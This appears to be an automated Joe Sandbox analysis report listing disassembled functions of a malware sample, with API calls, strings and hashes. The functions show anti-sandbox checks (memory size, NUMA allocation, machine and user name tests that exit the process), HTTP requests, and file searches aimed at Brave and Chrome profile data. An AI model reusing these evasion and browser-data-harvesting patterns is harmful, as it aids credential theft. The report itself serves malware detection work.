Function 00401220 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0040123E
__aulldiv.LIBCMT ref: 00401258
__aulldiv.LIBCMT ref: 00401266
ExitProcess.KERNEL32 ref: 00401294

Strings

@, xrefs: 00401233

Memory Dump Source

Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: __aulldiv$ExitGlobalMemoryProcessStatus
String ID: @
API String ID: 3404098578-2766056989
Opcode ID: e3d9931386e0fa91028f4e7641da7fda79c4023127bcc5196728e9d9e144d5c4
Instruction ID: f2ded3d157cb35307e0b39d430c96622be3dd75f8d5744ac0086d878f352425a
Opcode Fuzzy Hash: e3d9931386e0fa91028f4e7641da7fda79c4023127bcc5196728e9d9e144d5c4
Instruction Fuzzy Hash: 5901FBB0D84308BAEB10DBE4DC49B9EBB78AB15705F20809EE705B62D0D6785585879D

Function 00416AF3 Relevance: 6.0, APIs: 4, Instructions: 30
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00899BA0,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00416ACA
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00416AE8
CloseHandle.KERNEL32(00000000), ref: 00416AF9
Sleep.KERNEL32(00001770), ref: 00416B04
CloseHandle.KERNEL32(?,00000000,?,00899BA0,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00416B1A
ExitProcess.KERNEL32 ref: 00416B22

Memory Dump Source

Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: CloseEventHandle$CreateExitOpenProcessSleep
String ID:
API String ID: 941982115-0
Opcode ID: 7c87040c747da0acdc92787bbe7dfdf8e9b0063e40ee03b256faf14453658583
Instruction ID: 3c4b1c3760862ff095f4b16c882d5da3ff279df4080b6ba6633acb61265b60b7
Opcode Fuzzy Hash: 7c87040c747da0acdc92787bbe7dfdf8e9b0063e40ee03b256faf14453658583
Instruction Fuzzy Hash: E9F0BE34A84219AFE710EBE0DC06BFE7B35EF04381F11451AF502A11C0CBB8A581D65F

Function 004151F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON

Download Yara Rule

APIs

Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6

Part of subcall function 00406280: InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 004062E1
Part of subcall function 00406280: StrCmpCA.SHLWAPI(?,008CAEB0), ref: 00406303
Part of subcall function 00406280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406335
Part of subcall function 00406280: HttpOpenRequestA.WININET(00000000,GET,?,008CA638,00000000,00000000,00400100,00000000), ref: 00406385
Part of subcall function 00406280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 004063BF
Part of subcall function 00406280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004063D1

StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415228

Strings

ERROR, xrefs: 00415273
ERROR, xrefs: 0041521A

Memory Dump Source

Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
String ID: ERROR$ERROR
API String ID: 3287882509-2579291623
Opcode ID: 287c4944f2ba1a5879c5b57656c8dc51a31da8e3a5e3b78fb2e1df7df1d21834
Instruction ID: 74302943fe5589af4790b43ef38c2dd3b69765dcd24c28c5b90e35499643ece9
Opcode Fuzzy Hash: 287c4944f2ba1a5879c5b57656c8dc51a31da8e3a5e3b78fb2e1df7df1d21834
Instruction Fuzzy Hash: 2D113330901008ABCB14FF61DD52AED7338AF50354F90416EF81A5A5D2EF38AB56CA9A

Function 004178E0 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00416A2B), ref: 00417910
HeapAlloc.KERNEL32(00000000,?,?,?,00416A2B), ref: 00417917
GetComputerNameA.KERNEL32(?,00000104), ref: 0041792F

Memory Dump Source

Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: Heap$AllocComputerNameProcess
String ID:
API String ID: 4203777966-0
Opcode ID: 655548885853275668edecfa1cfdfba2d4285fba1d09bdc7eb36c2d1d55ec877
Instruction ID: 452d18c19ae851532a1d010ea63a4611fd0250a2e86211d30d2d96ca9096ca29
Opcode Fuzzy Hash: 655548885853275668edecfa1cfdfba2d4285fba1d09bdc7eb36c2d1d55ec877
Instruction Fuzzy Hash: 220186F1A48204EFD700DF94DD45BAABBB8FB05B11F10425AF545E3280C37859448BA6

Function 00401110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,00416A1C), ref: 0040112B
VirtualAllocExNuma.KERNEL32(00000000,?,?,00416A1C), ref: 00401132
ExitProcess.KERNEL32 ref: 00401143

Memory Dump Source

Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: Process$AllocCurrentExitNumaVirtual
String ID:
API String ID: 1103761159-0
Opcode ID: 3cbd8cc13bf7dc70ab035dff78f9dd202cda3002ce084c09b8f89ce2de56700b
Instruction ID: 516f97497d3ee46bc55051264f2a31c9d8efacdbd59bd60d04d859dfb32d17c4
Opcode Fuzzy Hash: 3cbd8cc13bf7dc70ab035dff78f9dd202cda3002ce084c09b8f89ce2de56700b
Instruction Fuzzy Hash: 76E08674985308FFE7106BE09C0AB0976B9EB05B05F101055F7087A1D0C6B826009699

Function 0089B346 Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 0089B36E
Module32First.KERNEL32(00000000,00000224), ref: 0089B38E

Memory Dump Source

Source File: 00000000.00000002.2241173522.000000000089A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0089A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_89a000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: 77b64900f358692071377e86b58d0239e34d48d7da5eaa189ba1533dc0506448
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: B1F06231500714ABDB207AF9A98DA6EB6E8FF49725F140528F646D21C0DB70E8459661

Function 00810E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000400,?,?,00810223,?,?), ref: 00810E19
SetErrorMode.KERNEL32(00000000,?,?,00810223,?,?), ref: 00810E1E

Memory Dump Source

Source File: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: 38a33d7cf77271eff4fc9badce6bc49676e91161f5414cc284fa2bfc160f7c8c
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: 5AD0123114512877DB002A95DC09BCD7B1CDF05B62F008411FB0DD9080C7B0998046E5

Function 004010A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004,?,?,?,0040114E,?,?,00416A1C), ref: 004010B3
VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0,?,?,?,0040114E,?,?,00416A1C), ref: 004010F7

Memory Dump Source

Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: 8ce35272a596f1cdf5aa55b7e6bb44489e409ba54c945097ad2cb9ba566d6231
Instruction ID: e05e9ea69c75ff17789b13d2c0695db9e8f3777892ad192db41722de5b6306ee
Opcode Fuzzy Hash: 8ce35272a596f1cdf5aa55b7e6bb44489e409ba54c945097ad2cb9ba566d6231
Instruction Fuzzy Hash: F2F052B1681208BBE7109BA4AC49FABB3E8E305B14F301408F500E3380C5319E00CAA4

Function 00401190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 004178E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00416A2B), ref: 00417910
Part of subcall function 004178E0: HeapAlloc.KERNEL32(00000000,?,?,?,00416A2B), ref: 00417917
Part of subcall function 004178E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0041792F

Part of subcall function 00417850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417880
Part of subcall function 00417850: HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417887
Part of subcall function 00417850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0041789F

ExitProcess.KERNEL32 ref: 004011C6

Memory Dump Source

Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocName$ComputerExitUser
String ID:
API String ID: 1004333139-0
Opcode ID: beae5ea4bba28d8bcdb6621297b085ccf5731606b7c52db2eb8bbe7634c0c08e
Instruction ID: 3272f285758621328f1ae990cc0b7bdad84480bea6fe4891c0ce75a2ed71569b
Opcode Fuzzy Hash: beae5ea4bba28d8bcdb6621297b085ccf5731606b7c52db2eb8bbe7634c0c08e
Instruction Fuzzy Hash: 72E0C2B999030123DB0433F2AD0AB6B329D5B0538DF04042EFA08D2252FE2CE84085AE

Function 0089B005 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 0089B056

Memory Dump Source

Source File: 00000000.00000002.2241173522.000000000089A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0089A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_89a000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: 61ad45a6ac1bcd40f57640fb2f1fa2ec51acbbb090b678ae65f8c9da0458e28d
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: 2B113C79A00208EFDB01DF98CA85E99BBF5EF08350F098094F9489B362D371EA50DF80

Non-executed Functions

Function 004138B0 Relevance: 51.0, APIs: 21, Strings: 8, Instructions: 250filestringCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 004138CC
FindFirstFileA.KERNEL32(?,?), ref: 004138E3
lstrcatA.KERNEL32(?,?,?,00000104,?,00000104), ref: 00413935
StrCmpCA.SHLWAPI(?,00420F70), ref: 00413947
StrCmpCA.SHLWAPI(?,00420F74), ref: 0041395D
FindNextFileA.KERNEL32(000000FF,?), ref: 00413C67
FindClose.KERNEL32(000000FF), ref: 00413C7C

Strings

%s%s, xrefs: 00413AAD
1#v, xrefs: 004138E3
P2#v, xrefs: 00413C67
%s\%s, xrefs: 00413A6F
%s\%s\%s, xrefs: 00413A4A
%s\*, xrefs: 004138C0
!=A, xrefs: 00413C82, 00413C45, 00413B69, 00413909, 00413B6C, 00413C48
%s\%s, xrefs: 0041397A

Memory Dump Source

Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextlstrcatwsprintf
String ID: !=A$%s%s$%s\%s$%s\%s$%s\%s\%s$%s\*$P2#v$1#v
API String ID: 1125553467-1890188023
Opcode ID: 8791cea4fdcc51078b83b32db4eaf7b09dc70f878dd535264430eb58c9f2cac6
Instruction ID: 6b32dcbabd2ae606338a05af88a65253e6d0136fcb4401239c8972690a9ca057
Opcode Fuzzy Hash: 8791cea4fdcc51078b83b32db4eaf7b09dc70f878dd535264430eb58c9f2cac6
Instruction Fuzzy Hash: 45A182B5A40218ABDB20DFA4DC85FEA7379BF45301F04458DB50D96181EB789B84CF66

Function 0040BE70 Relevance: 40.9, APIs: 17, Strings: 6, Instructions: 675fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788

Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982

Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12

Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905

FindFirstFileA.KERNEL32(00000000,?,00420B32,00420B2B,00000000,?,?,?,004213F4,00420B2A), ref: 0040BEF5
StrCmpCA.SHLWAPI(?,004213F8), ref: 0040BF4D
StrCmpCA.SHLWAPI(?,004213FC), ref: 0040BF63
FindNextFileA.KERNEL32(000000FF,?), ref: 0040C7BF
FindClose.KERNEL32(000000FF), ref: 0040C7D1

Strings

\Brave\Preferences, xrefs: 0040C1DB
1#v, xrefs: 0040BEF5
P2#v, xrefs: 0040C7BF
Preferences, xrefs: 0040C11E
Google Chrome, xrefs: 0040C634
Brave, xrefs: 0040C102

Memory Dump Source

Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID: Brave$Google Chrome$P2#v$Preferences$\Brave\Preferences$1#v
API String ID: 3334442632-1392536997
Opcode ID: 0a7976044a15c6e1a47e7bb651738ac5a93916ab5623d5d417d7de4c0f42f271
Instruction ID: 2d1308125da8926fdde3e90b6322e2b17ae592ee2aa58173b84b0ef8a3c681e1
Opcode Fuzzy Hash: 0a7976044a15c6e1a47e7bb651738ac5a93916ab5623d5d417d7de4c0f42f271
Instruction Fuzzy Hash: 4E42B871910104ABCB14FB71DD96EED733DAF44304F40456EB50AA60C1EF389B99CBAA

Function 00414910 Relevance: 40.4, APIs: 18, Strings: 5, Instructions: 172fileCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 0041492C
FindFirstFileA.KERNEL32(?,?), ref: 00414943
StrCmpCA.SHLWAPI(?,00420FDC), ref: 00414971
StrCmpCA.SHLWAPI(?,00420FE0), ref: 00414987
FindNextFileA.KERNEL32(000000FF,?), ref: 00414B7D
FindClose.KERNEL32(000000FF), ref: 00414B92

Strings

1#v, xrefs: 00414943
P2#v, xrefs: 00414B7D
%s\%s, xrefs: 004149FB
%s\%s, xrefs: 004149A4
%s\*, xrefs: 00414920

Memory Dump Source

Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\%s$%s\%s$%s\*$P2#v$1#v
API String ID: 180737720-322404123
Opcode ID: dd01fc369b5388c5bfb31bfe2d46f2fde17b2a46eb7854bc19da0db36a1e72aa
Instruction ID: f0ba0eb1991201f306808920aeaa9e90ed650eb79ad5a8a04d265ad4202cf965
Opcode Fuzzy Hash: dd01fc369b5388c5bfb31bfe2d46f2fde17b2a46eb7854bc19da0db36a1e72aa
Instruction Fuzzy Hash: E66175B5950218ABCB20EBE0DC45FEA73BDBB49700F40458DB50996181EB74EB85CF95

Function 00414570 Relevance: 33.4, APIs: 15, Strings: 4, Instructions: 137stringmemoryfileCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00414580
HeapAlloc.KERNEL32(00000000), ref: 00414587
wsprintfA.USER32 ref: 004145A6
FindFirstFileA.KERNEL32(?,?), ref: 004145BD
StrCmpCA.SHLWAPI(?,00420FC4), ref: 004145EB
StrCmpCA.SHLWAPI(?,00420FC8), ref: 00414601
FindNextFileA.KERNEL32(000000FF,?), ref: 0041468B
FindClose.KERNEL32(000000FF), ref: 004146A0
lstrcatA.KERNEL32(?,008CADE0,?,00000104), ref: 004146C5
lstrcatA.KERNEL32(?,008C9D40), ref: 004146D8
lstrlenA.KERNEL32(?), ref: 004146E5
lstrlenA.KERNEL32(?), ref: 004146F6

Strings

%s\%s, xrefs: 0041461B
1#v, xrefs: 004145BD
%s\*, xrefs: 0041459A
P2#v, xrefs: 0041468B

Memory Dump Source

Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: Find$FileHeaplstrcatlstrlen$AllocCloseFirstNextProcesswsprintf
String ID: %s\%s$%s\*$P2#v$1#v
API String ID: 13328894-4226942003
Opcode ID: 6e0b2a7f719afdb9f67bf6bddbb53f06d515f99307fed51ad2247f5638f38586
Instruction ID: 82eaf0d031878973a8df5e9a00467f3300e65aa4f81b4767f6d66ede98fc483b
Opcode Fuzzy Hash: 6e0b2a7f719afdb9f67bf6bddbb53f06d515f99307fed51ad2247f5638f38586
Instruction Fuzzy Hash: 195177B5950218ABC720EBB0DC89FEE737DAB54304F40458DB60996190EB789BC58F96

Function 00823B17 Relevance: 31.8, APIs: 21, Instructions: 250filestringCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 00823B33
FindFirstFileA.KERNEL32(?,?), ref: 00823B4A
lstrcat.KERNEL32(?,?), ref: 00823B9C
StrCmpCA.SHLWAPI(?,00420F70), ref: 00823BAE
StrCmpCA.SHLWAPI(?,00420F74), ref: 00823BC4
FindNextFileA.KERNEL32(000000FF,?), ref: 00823ECE
FindClose.KERNEL32(000000FF), ref: 00823EE3

Memory Dump Source

Source File: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextlstrcatwsprintf
String ID:
API String ID: 1125553467-0
Opcode ID: 4559a2751c43def235363665869aa0b92e5680d670ebeacc1df313f03f1736d8
Instruction ID: 2aeb10fd657d9c03f02b75a86a3c6069d50140f86b77009adc88ad3f7d191c21
Opcode Fuzzy Hash: 4559a2751c43def235363665869aa0b92e5680d670ebeacc1df313f03f1736d8
Instruction Fuzzy Hash: 49A15DB5A40218ABDB24DFA4DC85FEA73B9FF49300F044588B60D96181EB759B84CF62

Function 00824B77 Relevance: 27.2, APIs: 18, Instructions: 172fileCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 00824B93
FindFirstFileA.KERNEL32(?,?), ref: 00824BAA
StrCmpCA.SHLWAPI(?,00420FDC), ref: 00824BD8
StrCmpCA.SHLWAPI(?,00420FE0), ref: 00824BEE
FindNextFileA.KERNEL32(000000FF,?), ref: 00824DE4
FindClose.KERNEL32(000000FF), ref: 00824DF9

Memory Dump Source

Source File: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID:
API String ID: 180737720-0
Opcode ID: 78984cc8b84f1b8f18172e07a0d5b5a7c4859d44debcdf1ecac8b22b5592097a
Instruction ID: 86985b123e2dc82e2c1e6f94c4ff3a64b7cd364a6d507c9cf3f4372f11a2d62c
Opcode Fuzzy Hash: 78984cc8b84f1b8f18172e07a0d5b5a7c4859d44debcdf1ecac8b22b5592097a
Instruction Fuzzy Hash: C9618775540218ABCB24EBE4ED49FEA73BDFF49300F004588B609D2141EB759B84CFA2

Function 00413EA0 Relevance: 26.4, APIs: 12, Strings: 3, Instructions: 133fileCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 00413EC3
FindFirstFileA.KERNEL32(?,?), ref: 00413EDA
StrCmpCA.SHLWAPI(?,00420FAC), ref: 00413F08
StrCmpCA.SHLWAPI(?,00420FB0), ref: 00413F1E
FindNextFileA.KERNEL32(000000FF,?), ref: 0041406C
FindClose.KERNEL32(000000FF), ref: 00414081

Strings

1#v, xrefs: 00413EDA
P2#v, xrefs: 0041406C
%s\%s, xrefs: 00413EB7

Memory Dump Source

Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\%s$P2#v$1#v
API String ID: 180737720-1025293131
Opcode ID: 08d8b5707085556954652948dce7410593c86d1cefa4e3426e9ef0f3fe249a5a
Instruction ID: d668781d41669175768d5c9beeab67687ce79b442868c28804f29fd14ebf2a74
Opcode Fuzzy Hash: 08d8b5707085556954652948dce7410593c86d1cefa4e3426e9ef0f3fe249a5a
Instruction Fuzzy Hash: 475173B6910218BBCB24FBB0DC85FEA737DBB48304F40458DB61996180EB79DB858F95

